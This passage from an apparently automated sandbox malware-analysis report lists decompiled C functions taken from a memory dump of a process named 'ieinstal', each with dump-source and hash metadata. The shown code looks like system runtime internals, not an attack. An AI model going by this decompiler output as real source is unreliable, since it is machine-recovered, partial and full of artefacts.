                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v56);
                        				_push(0x10);
                        				_push(0x402);
                        				_push( *_t18 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E1EDC131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				short _v50;
                        				char _v56;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v8 =  *0x1edfd360 ^ _t32;
                        				_v20 = _a4;
                        				_v12 = _a8;
                        				_v24 = __ecx;
                        				_v16 = __edx;
                        				_v50 = 0x1021;
                        				if(E1ED27D50() == 0) {
                        					_t18 = 0x7ffe0380;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				_push( &_v56);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E1EDC1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				short _v46;
                        				char _v52;
                        				signed char* _t15;
                        				intOrPtr _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				signed int _t29;
                        
                        				_t26 = __edx;
                        				_v8 =  *0x1edfd360 ^ _t29;
                        				_v12 = _a4;
                        				_v20 = __ecx;
                        				_v16 = __edx;
                        				_v46 = 0x1024;
                        				if(E1ED27D50() == 0) {
                        					_t15 = 0x7ffe0380;
                        				} else {
                        					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				_push( &_v52);
                        				_push(0xc);
                        				_push(0x20402);
                        				_push( *_t15 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED2C577(void* __ecx, char _a4) {
                        				void* __esi;
                        				void* __ebp;
                        				void* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t18 = __ecx;
                        				_t21 = __ecx;
                        				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E1ED2C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x1ece11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					__eflags = _a4;
                        					if(__eflags != 0) {
                        						L10:
                        						E1EDD88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                        						L9:
                        						return 0;
                        					}
                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        					if(__eflags == 0) {
                        						goto L10;
                        					}
                        					goto L9;
                        				} else {
                        					return 1;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 43%
                        			E1EDD8D34(intOrPtr __ecx, intOrPtr __edx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				short _v42;
                        				char _v48;
                        				signed char* _t12;
                        				intOrPtr _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t25;
                        				signed int _t26;
                        
                        				_t23 = __edx;
                        				_v8 =  *0x1edfd360 ^ _t26;
                        				_v16 = __ecx;
                        				_v42 = 0x1c2b;
                        				_v12 = __edx;
                        				if(E1ED27D50() == 0) {
                        					_t12 = 0x7ffe0386;
                        				} else {
                        					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v48);
                        				_push(8);
                        				_push(0x20402);
                        				_push( *_t12 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E1ED4927A(void* __ecx) {
                        				signed int _t11;
                        				void* _t14;
                        
                        				_t11 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                        				if(_t11 != 0) {
                        					E1ED4FA60(_t11, 0, 0x98);
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                        					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                        					E1ED492C6(_t11, _t14);
                        				}
                        				return _t11;
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E1EDC2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                        				void* __esi;
                        				signed char _t3;
                        				signed char _t7;
                        				void* _t19;
                        
                        				_t17 = __ecx;
                        				_t3 = E1EDBFD22(__ecx);
                        				_t19 =  *0x1edf849c - _t3; // 0x0
                        				if(_t19 == 0) {
                        					__eflags = _t17 -  *0x1edf8748; // 0x0
                        					if(__eflags <= 0) {
                        						E1EDC1C06();
                        						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                        						__eflags = _t3;
                        						if(_t3 != 0) {
                        							L5:
                        							__eflags =  *0x1edf8724 & 0x00000004;
                        							if(( *0x1edf8724 & 0x00000004) == 0) {
                        								asm("int3");
                        								return _t3;
                        							}
                        						} else {
                        							_t3 =  *0x7ffe02d4 & 0x00000003;
                        							__eflags = _t3 - 3;
                        							if(_t3 == 3) {
                        								goto L5;
                        							}
                        						}
                        					}
                        					return _t3;
                        				} else {
                        					_t7 =  *0x1edf8724; // 0x0
                        					return E1EDB8DF1(__ebx, 0xc0000374, 0x1edf5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED04F2E(void* __ecx, char _a4) {
                        				void* __esi;
                        				void* __ebp;
                        				void* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t18 = __ecx;
                        				_t21 = __ecx;
                        				if(__ecx == 0) {
                        					L6:
                        					__eflags = _a4;
                        					if(__eflags != 0) {
                        						L8:
                        						E1EDD88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                        						L9:
                        						return 0;
                        					}
                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        					if(__eflags != 0) {
                        						goto L9;
                        					}
                        					goto L8;
                        				}
                        				_t18 = __ecx + 0x30;
                        				if(E1ED2C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1ece1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					goto L6;
                        				} else {
                        					return 1;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 36%
                        			E1EDD8CD6(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				short _v38;
                        				char _v44;
                        				signed char* _t11;
                        				intOrPtr _t17;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				signed int _t25;
                        
                        				_v8 =  *0x1edfd360 ^ _t25;
                        				_v12 = __ecx;
                        				_v38 = 0x1c2d;
                        				if(E1ED27D50() == 0) {
                        					_t11 = 0x7ffe0386;
                        				} else {
                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v44);
                        				_push(0xffffffe4);
                        				_push(0x402);
                        				_push( *_t11 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E1ED2746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                        				signed int _t8;
                        				void* _t10;
                        				short* _t17;
                        				void* _t19;
                        				intOrPtr _t20;
                        				void* _t21;
                        
                        				_t20 = __esi;
                        				_t19 = __edi;
                        				_t17 = __ebx;
                        				if( *((char*)(_t21 - 0x25)) != 0) {
                        					if(__ecx == 0) {
                        						E1ED1EB70(__ecx, 0x1edf79a0);
                        					} else {
                        						asm("lock xadd [ecx], eax");
                        						if((_t8 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(__ecx + 4)));
                        							E1ED495D0();
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                        							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                        							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                        						}
                        					}
                        					L10:
                        				}
                        				_t10 = _t19 + _t19;
                        				if(_t20 >= _t10) {
                        					if(_t19 != 0) {
                        						 *_t17 = 0;
                        						return 0;
                        					}
                        				}
                        				return _t10;
                        				goto L10;
                        			}










                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2bb1bf4ccf39c310ac78fe7c79095638ce58b00605190d6f5de4a5073202f006
                        • Instruction ID: 6056325fea61615cfba5588ca6518e0ff4eb05dbf9ed522a63dfbce10d04ac76
                        • Opcode Fuzzy Hash: 2bb1bf4ccf39c310ac78fe7c79095638ce58b00605190d6f5de4a5073202f006
                        • Instruction Fuzzy Hash: 85F0BE38D541C7EFDB218B68C840BA97BA2AF0421CF920776D890AB1A0E724E8028795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 36%
                        			E1EDD8B58(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v20;
                        				short _v46;
                        				char _v52;
                        				signed char* _t11;
                        				intOrPtr _t17;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				signed int _t25;
                        
                        				_v8 =  *0x1edfd360 ^ _t25;
                        				_v20 = __ecx;
                        				_v46 = 0x1c26;
                        				if(E1ED27D50() == 0) {
                        					_t11 = 0x7ffe0386;
                        				} else {
                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v52);
                        				_push(4);
                        				_push(0x402);
                        				_push( *_t11 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                        			}














                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6439c5662549146f08f79e7398d22b3fe0b1c3a01e0926b49de694b4701204a
                        • Instruction ID: 2408a6a1dc67f58629fea3a2f4c14bccb7432a5dad7c81235eb3b9f6288b748d
                        • Opcode Fuzzy Hash: c6439c5662549146f08f79e7398d22b3fe0b1c3a01e0926b49de694b4701204a
                        • Instruction Fuzzy Hash: 32F082B4A04259ABDB00DBB9D916F6EB7B4FF04300F550559BA05EB3C1EB74E900C7A8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED3A44B(signed int __ecx) {
                        				intOrPtr _t13;
                        				signed int _t15;
                        				signed int* _t16;
                        				signed int* _t17;
                        
                        				_t13 =  *0x1edf7b9c; // 0x0
                        				_t15 = __ecx;
                        				_t16 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                        				if(_t16 == 0) {
                        					return 0;
                        				}
                        				 *_t16 = _t15;
                        				_t17 =  &(_t16[2]);
                        				E1ED4FA60(_t17, 0, _t15 << 2);
                        				return _t17;
                        			}








                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4a79365269d9c69d7dd5cd1a876f8e15bc94d23d69c711952a0c86bb3c34d7d4
                        • Instruction ID: f838051458d60ea1b28362ff6b81ebd60c5eba7187db16adb3b0295b732fe60e
                        • Opcode Fuzzy Hash: 4a79365269d9c69d7dd5cd1a876f8e15bc94d23d69c711952a0c86bb3c34d7d4
                        • Instruction Fuzzy Hash: C3E092B2B01421ABD2118B18EC00F9673ADDBE5656F1A4539E948C7254D628ED02C7E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E1ED0F358(void* __ecx, signed int __edx) {
                        				char _v8;
                        				signed int _t9;
                        				void* _t20;
                        
                        				_push(__ecx);
                        				_t9 = 2;
                        				_t20 = 0;
                        				if(E1ED3F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                        					_t20 = L1ED24620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                        				}
                        				return _t20;
                        			}







                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction ID: 7b90a0d8abae9616b475ccf628b7eeaba9a5db6c689a47aaae7d766b00157300
                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction Fuzzy Hash: 2DE06832A00218BFCB2087C88D01F9ABBBCDF44A61F100691F904D7090C5209D40C2D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED1FF60(intOrPtr _a4) {
                        				void* __ecx;
                        				void* __ebp;
                        				void* _t13;
                        				intOrPtr _t14;
                        				void* _t15;
                        				void* _t16;
                        				void* _t17;
                        
                        				_t14 = _a4;
                        				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x1ece11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					return E1EDD88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                        				} else {
                        					return E1ED20050(_t14);
                        				}
                        			}











                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9dcb11ed76eebc5b7479c6aa95dbad2bb4a522c4c1bde85a3a624232d4e4fc8
                        • Instruction ID: eca48a8e4447921e15f1967ed3e4bd8c686b2e90aa05508f9332cb9468ef7e83
                        • Opcode Fuzzy Hash: b9dcb11ed76eebc5b7479c6aa95dbad2bb4a522c4c1bde85a3a624232d4e4fc8
                        • Instruction Fuzzy Hash: BEE0DFB52192C69FD324CB52F150F097B9ABF62721F1A879DF00A4F541C762E8C8C216
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1EDBD380(void* __ecx, void* __edx, intOrPtr _a4) {
                        				void* _t5;
                        
                        				if(_a4 != 0) {
                        					_t5 = L1ED0E8B0(__ecx, _a4, 0xfff);
                        					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        					return _t5;
                        				}
                        				return 0xc000000d;
                        			}





                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction ID: a6a17ed8361b64618c999754e0a4c2216c88a474712951605998247cf72fa59e
                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction Fuzzy Hash: DCE0C235280685BBDB224E44CC00F697B16DB907A0F104531FE095B7D1C775EC91D6E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E1ED941E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				void* _t5;
                        				void* _t14;
                        
                        				_push(8);
                        				_push(0x1ede08f0);
                        				_t5 = E1ED5D08C(__ebx, __edi, __esi);
                        				if( *0x1edf87ec == 0) {
                        					E1ED1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                        					if( *0x1edf87ec == 0) {
                        						 *0x1edf87f0 = 0x1edf87ec;
                        						 *0x1edf87ec = 0x1edf87ec;
                        						 *0x1edf87e8 = 0x1edf87e4;
                        						 *0x1edf87e4 = 0x1edf87e4;
                        					}
                        					 *(_t14 - 4) = 0xfffffffe;
                        					_t5 = L1ED94248();
                        				}
                        				return E1ED5D0D1(_t5);
                        			}






                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb0b10586e0d7e200ceacf98c9e90c958164df3a2ec7585fe6085a7a84462a6c
                        • Instruction ID: 467fb69245ba89d39e7394965ecad46468800a12982923913ea5e4f2ec14dfa2
                        • Opcode Fuzzy Hash: fb0b10586e0d7e200ceacf98c9e90c958164df3a2ec7585fe6085a7a84462a6c
                        • Instruction Fuzzy Hash: 8BF0F27CC217A1CFCB90DBAA8AA7708B6B4FB44720F504A2AD0028A284C7345487DF22
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED3A185() {
                        				void* __ecx;
                        				intOrPtr* _t5;
                        
                        				if( *0x1edf67e4 >= 0xa) {
                        					if(_t5 < 0x1edf6800 || _t5 >= 0x1edf6900) {
                        						return L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                        					} else {
                        						goto L1;
                        					}
                        				} else {
                        					L1:
                        					return E1ED20010(0x1edf67e0, _t5);
                        				}
                        			}






                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6e820c3de580b79289cc2b3f1a4bf992d61b2c4eacdba29d0b1ef5abc6df2b3
                        • Instruction ID: 8f2bba4b0dce293340b909e831099ebd8190e0dc899a7770abeb17e294084757
                        • Opcode Fuzzy Hash: e6e820c3de580b79289cc2b3f1a4bf992d61b2c4eacdba29d0b1ef5abc6df2b3
                        • Instruction Fuzzy Hash: 60D02BA1E20040A6E62C87318950B1D2213ABC0B01F710F1DE0130FED5DB9098D282D2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED316E0(void* __edx, void* __eflags) {
                        				void* __ecx;
                        				void* _t3;
                        
                        				_t3 = E1ED31710(0x1edf67e0);
                        				if(_t3 == 0) {
                        					_t6 =  *[fs:0x30];
                        					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                        						goto L1;
                        					} else {
                        						return L1ED24620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                        					}
                        				} else {
                        					L1:
                        					return _t3;
                        				}
                        			}






                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6088f154315d6c389a964aa00ab1e4aae250c697f26677ac04f6fb26a67868f2
                        • Instruction ID: dc426352000ed7ff8dde07899b46d49d30dffc5ff99e0085baad00bd8073c3a8
                        • Opcode Fuzzy Hash: 6088f154315d6c389a964aa00ab1e4aae250c697f26677ac04f6fb26a67868f2
                        • Instruction Fuzzy Hash: 29D0A7B210014293DA1D8B319810B1432B29BC0B87F34066CF10749CC1CFA0EC92E458
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED853CA(void* __ebx) {
                        				intOrPtr _t7;
                        				void* _t13;
                        				void* _t14;
                        				intOrPtr _t15;
                        				void* _t16;
                        
                        				_t13 = __ebx;
                        				if( *((char*)(_t16 - 0x65)) != 0) {
                        					E1ED1EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                        					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                        				}
                        				if(_t15 != 0) {
                        					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                        					return  *((intOrPtr*)(_t16 - 0x64));
                        				}
                        				return _t7;
                        			}









                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction ID: f10a85d4ff3f434991e249debb0aef258452f638fea301d124545555c5248c9b
                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction Fuzzy Hash: 5BE08C399006C09BCF02CB48C660F4EB7F6FB44B00F110514A4085F6A0C724EC00CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED335A1(void* __eax, void* __ebx, void* __ecx) {
                        				void* _t6;
                        				void* _t10;
                        				void* _t11;
                        
                        				_t10 = __ecx;
                        				_t6 = __eax;
                        				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                        					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                        				}
                        				if( *((char*)(_t11 - 0x1a)) != 0) {
                        					return E1ED1EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        				}
                        				return _t6;
                        			}







                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
